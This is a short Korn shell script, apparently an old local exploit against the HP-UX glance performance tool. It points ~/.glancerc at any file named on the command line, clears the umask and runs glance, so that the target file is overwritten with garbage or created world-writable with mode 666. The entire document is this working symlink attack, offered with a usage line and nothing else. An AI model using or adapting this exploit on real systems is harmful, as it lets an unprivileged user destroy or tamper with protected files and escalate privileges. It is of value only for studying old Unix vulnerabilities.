#!/bin/ksh # the one .traz FILE=$1 PROGGIE=`basename $0` GLANCE=/usr/perf/bin/glance if [ -z "$1" ] then echo "usage: $PROGGIE file_to_create_or_overwrite" exit fi if [ -f ~/.glancerc ] then mv ~/.glancerc ~/.glancerc.old fi umask 0 ln -s $FILE ~/.glancerc if [ -f $FILE ] then echo "File exists -- will be overwritten with garbage" else echo "File doesn't exist -- will be created mode 666" CREATE_666="yes" fi echo "Please wait about 10 seconds or so" ${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1 if [ -n "${CREATE_666}" ] then >$FILE fi rm ~/.glancerc if [ -f ~/.glancerc.old ] then mv ~/.glancerc.old ~/.glancerc fi